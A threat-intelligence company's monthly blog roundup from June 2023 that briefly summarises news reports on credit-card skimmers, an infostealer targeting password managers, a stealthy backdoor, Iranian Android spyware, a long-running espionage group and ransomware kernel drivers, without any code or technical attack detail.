Ann: The darknet is big, it’s diverse. There are a lot of different types of people in hoodies, not in hoodies, doing a lot of different types of things with different types of data. It’s important that we all stay realistic and and humble and pay attention to what’s going on out in the internet land.

Richard: Thank you to Allison and Andrew for their time, expertise, and valuable insights. And to our production team at Come Alive Creative. Follow the Building Cyber Resilience Podcast wherever you listen so you don’t miss an episode, we’ll catch you on the next show.

Curious how darknet data applies to your use case? Contact us.

Threat Intelligence RoundUp: May

Written by DarkOwl Content Team on . Posted in Blog.

June 01, 2023

Our analyst team shares a few articles each week in our email newsletter which goes every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. Hackers swap stealth for realistic checkout forms to steal credit cards – BleepingComputer

A report by Malwarebytes highlights how MageCart skimmers are using real online stores checkout pages and hijacking them with their own fraudulent but realistic-looking forms to steal credit card information. They are displayed as modal HTML pages that are convincingly superimposed onto the original page. At checkout the malware-laden checkout page is sophisticated, sometimes appeared more legitimate than the real one. Read full article.

2. ViperSoftX info-stealing malware now targets password managers – BleepingComputer

The most recent version of the ViperSoftX infostealer has been observed targeting password managers including KneePass and 1Password. Updated and more robust detection-evasion methods are also part of the new stealer. The malware installs targets Chrome, Brave, Edge, and Opera browsers with a malicious extension called VenomSoftX. According to Trend Micro, the malware has targeted the consumer and enterprise sectors in the U.S., Italy, Brazil, India, Australia, Japan, Taiwan, Malaysia, France, and Italy. According to analysts the malware can be distributed as software cracks, activators, and key generators and hides inside the not dangerous-looking software. The new version has additional features for detection-evasion techniques. A standout feature of the malware is its byte mapping used for code encryption which remaps and changes the order of shellcode bytes. Read more.

3. Stealthy MerDoor malware uncovered after five years of attacks  – BleepingComputer

A new Advanced Persistent Threat (APT) group named LanceFly is utilizing a custom, stealthy backdoor called “Merdoor” to target organizations in South and Southeast Asia since 2018. Methods for initial access are unclear, but Symantec has observed the group using methods such as phishing emails, SSH credential brute forcing, and others. Merdoor is put into “’perfhost.exe’ or ‘svchost.exe” which are both real Windows processes through DLL side-loading. The stealthy backdoor is persistent and can remain on devices between reboots. The backdoor establishes connection with a C2 server, from which it can be given instructions. Read full article.

4. BouldSpy Android Spyware: Iranian Government’s Alleged Tool for Spying on Minority Groups – The Hacker News

With a moderate confidence level, Lookout has attributed a malware called BouldSpy (names DAAM by Cyble) to the Law Enforcement Command of the Islamic Republic of Iran. Victims of the malware’s use include minority groups such as “Kurds, Baluchis, Azeris, and Armenian Christian groups.” It is an Android-based malware family, and the intrusion vector appears to be via physical access to devices. It has a C2 panel to influence victim’s devices and creates other malicious applications masqueraded as harmless apps like a currency converter. Among other impressive features it is able to disable battery features so that the victim device will never remove the malware. It utilizes an element from the open source CryDroid, which could indicate the malware is still being developed or being used as a false flag. Read more.

5. Bad Magic’s Extended Reign in Cyber Espionage Goes Back Over a Decade – The Hacker News

Threat actor, Bad Magic (aka Red Stinger), has been linked to a new cyberattacks targeting companies in the Russo-Ukrainian area, but also to multiple activities back in May of 2016 – meaning that this threat actor has been around for longer than originally thought. Read here.

6. Malicious Windows kernel drivers used in BlackCat ransomware attacks – BleepingComputer

According to Trend Micro, the ALPHV ransomware group (aka BlackCat) has been observed employing improved signed malicious Windows kernel drivers, known as “POORTRY,” in order to not be detected while conducting cyberattacks by security software. Read more.

Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

Products

Services

Use Cases

Company

Copyright © 2024 DarkOwl, LLC All rights reserved.
Privacy Policy
DarkOwl is a Denver-based company that provides the world’s largest index of darknet content and the tools to efficiently find leaked or otherwise compromised sensitive data. We shorten the timeframe to detection of compromised data on the darknet, empowering organizations to swiftly detect security gaps and mitigate damage prior to misuse of their data.